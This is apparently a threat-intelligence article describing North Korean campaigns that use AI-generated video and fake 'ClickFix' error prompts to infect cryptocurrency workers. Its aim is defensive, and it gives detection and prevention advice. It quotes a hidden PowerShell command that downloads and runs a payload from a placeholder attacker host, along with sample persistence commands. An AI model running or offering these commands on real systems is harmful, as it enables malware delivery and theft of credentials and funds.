North Korea Deploys AI-Generated Video and ClickFix

DPRK Combines AI and Social Engineering

North Korean state-sponsored threat actors are conducting highly targeted campaigns against the cryptocurrency sector using a sophisticated combination of AI-generated video content and the ClickFix social engineering technique to deliver malware payloads to both macOS and Windows systems.

This represents a significant evolution in North Korea's cyber operations, combining cutting-edge AI capabilities with proven social engineering tactics.

The ClickFix Technique Explained

What is ClickFix?

ClickFix is a social engineering technique that tricks victims into executing malicious commands by:

1. Creating a fake error message (browser error, security warning, update notification)
2. Providing "helpful" instructions to fix the non-existent problem
3. Guiding victims to execute malicious code (PowerShell, terminal commands, scripts)

Example Attack Flow

1. Victim receives realistic-looking error:
   "Browser Security Certificate Expired"

2. Pop-up provides "solution":
   "To fix this issue, press Win+R and paste this command:"

3. Malicious PowerShell command:
   powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker[.]com/payload')"

The technique is devastatingly effective because:

• Victims execute commands themselves (bypasses security warnings)
• No traditional malware delivery (no file downloads initially)
• Leverages trust in "official" error messages
• Works across operating systems

AI-Generated Video Component

Deepfake Social Engineering

North Korean operators are creating:

Fake Video Calls:

• AI-generated "recruiters" for cryptocurrency companies
• Deepfake executives conducting "security briefings"
• Synthetic "IT support" personnel requesting access

Pre-recorded Content:

• Tutorial videos with malicious instructions
• "Security update" announcements from fake vendors
• "Urgent patches" for cryptocurrency wallets

AI Video Characteristics

Modern AI video generation allows attackers to create:

• ✅ Realistic lip-sync and facial movements
• ✅ Convincing voice synthesis
• ✅ Appropriate business attire and backgrounds
• ✅ Multi-language support
• ✅ Real-time interactive capabilities (in some cases)

Target Profile: Cryptocurrency Sector

Why Cryptocurrency?

North Korean cyber operations have consistently targeted the cryptocurrency sector for:

1. Financial motivation: Direct theft of digital assets
2. Sanctions evasion: Converting stolen crypto to cash
3. Funding operations: Supporting nuclear and missile programs
4. Lower traceability: Harder to recover than traditional banking theft

Historical Context

Previous DPRK Cryptocurrency Operations:

• 2022-2024: Lazarus Group stole $3+ billion in crypto
• 2025: Increased focus on DeFi protocols and bridges
• 2026: AI-enhanced social engineering campaigns

Targeted Organizations

• Cryptocurrency exchanges
• DeFi protocol developers
• Blockchain security firms
• Cryptocurrency wallet providers
• NFT marketplaces
• Crypto venture capital firms

Multi-Platform Malware Delivery

macOS Targeting

Delivery mechanisms:

• Trojanized cryptocurrency applications
• Fake software updates for legitimate wallets
• Malicious browser extensions
• Xcode project files with embedded backdoors

macOS-specific payloads:

# Example persistence mechanism
~/Library/LaunchAgents/com.apple.update.plist
 
# Hidden directory for malware
~/.local/share/system-updates/

Windows Targeting

Delivery mechanisms:

• Malicious npm packages for crypto developers
• Infected Python cryptocurrency libraries
• Trojanized trading bots and automation tools
• Fake job applications with embedded malware

Windows-specific payloads:

# Registry persistence
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
 
# Scheduled tasks
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\update.exe"

Campaign Tactics, Techniques, and Procedures (TTPs)

Initial Access

Execution Chain

1. AI Video Call → Establish trust
2. ClickFix Error → Create urgency
3. Command Execution → Initial payload
4. Persistence → Scheduled tasks/LaunchAgents
5. C2 Connection → Establish communication
6. Lateral Movement → Network reconnaissance
7. Objective → Steal private keys, credentials, funds

MITRE ATT&CK Mapping

• T1566: Phishing (video-based social engineering)
• T1204: User Execution (ClickFix technique)
• T1059: Command and Scripting Interpreter
• T1053: Scheduled Task/Job
• T1555: Credentials from Password Stores
• T1552: Unsecured Credentials (crypto wallet keys)

Detection and Prevention

User Training

🎓 Educate employees about:

• AI-generated video deepfakes (subtle artifacts, unusual behavior)
• ClickFix social engineering (never paste unknown commands)
• Verification procedures (callback to known contacts)
• Cryptocurrency security best practices

Technical Controls

Endpoint Protection:

# Block suspicious PowerShell execution
Set-ExecutionPolicy Restricted -Scope CurrentUser
 
# Monitor for suspicious terminal commands
# Enable PowerShell script block logging

macOS Security:

# Enable Gatekeeper
sudo spctl --master-enable
 
# Verify code signatures
codesign -dv --verbose=4 /path/to/application
 
# Monitor LaunchAgents
ls -la ~/Library/LaunchAgents/

Network Monitoring:

• Monitor for connections to known DPRK infrastructure
• Block cryptocurrency-related domains on non-approved systems
• Implement DNS filtering for malicious domains

Application Security

For cryptocurrency organizations:

• ✅ Hardware security keys for all authentication
• ✅ Multi-signature wallets (no single points of failure)
• ✅ Cold storage for majority of assets
• ✅ Regular security audits of all code
• ✅ Strict code signing and verification processes

Indicators of Compromise (IoCs)

Behavioral Indicators

• Unsolicited job offers from cryptocurrency companies
• Requests to execute terminal/PowerShell commands
• Video calls with unusual video quality or artifacts
• Urgent "security updates" outside normal channels
• Requests for cryptocurrency wallet access or credentials

Technical Indicators

# Monitor for suspicious process execution
- powershell.exe with -encodedCommand flag
- osascript executing downloaded content
- curl/wget downloading from unusual domains
- Unusual LaunchAgents or scheduled tasks

Industry Response

Cryptocurrency Sector

Leading exchanges and platforms are:

• Implementing enhanced employee training programs
• Deploying deepfake detection tools for video calls
• Requiring in-person verification for sensitive operations
• Enhancing code review processes for all dependencies

Government Action

• US Treasury: Updated DPRK cyber threat advisories
• FBI: Issued warnings to cryptocurrency companies
• CISA: Released guidance on ClickFix techniques
• International cooperation: Enhanced intelligence sharing

Recommendations

For Cryptocurrency Organizations

🔒 Implement multi-layered security:

• Zero-trust architecture for all systems
• Hardware security keys mandatory
• Video call verification protocols
• Code signing and supply chain security
• Regular penetration testing
• Incident response planning specific to crypto theft

For Individuals

🛡️ Protect your crypto assets:

• Never execute commands from unknown sources
• Verify video calls through secondary channels
• Use hardware wallets for significant holdings
• Enable all available security features
• Regularly review account access logs
• Be skeptical of unsolicited contact

Conclusion

The combination of AI-generated video and ClickFix social engineering represents a sophisticated evolution in North Korean cyber operations. The cryptocurrency sector must adapt its security posture to address these advanced threats.

Key Takeaway: Human verification and security awareness remain critical defenses against even the most advanced AI-powered attacks. When in doubt, verify through known, trusted channels.

The threat is real, sophisticated, and financially motivated—but it can be defended against with proper awareness and security controls.

Related Reading

• North Korean Hackers Use Fake Zoom Meeting to Target Crypto
• Lazarus Group Plants 192 Malicious Packages in npm and PyPI
• All Four Major Nation-State Adversaries Now Weaponizing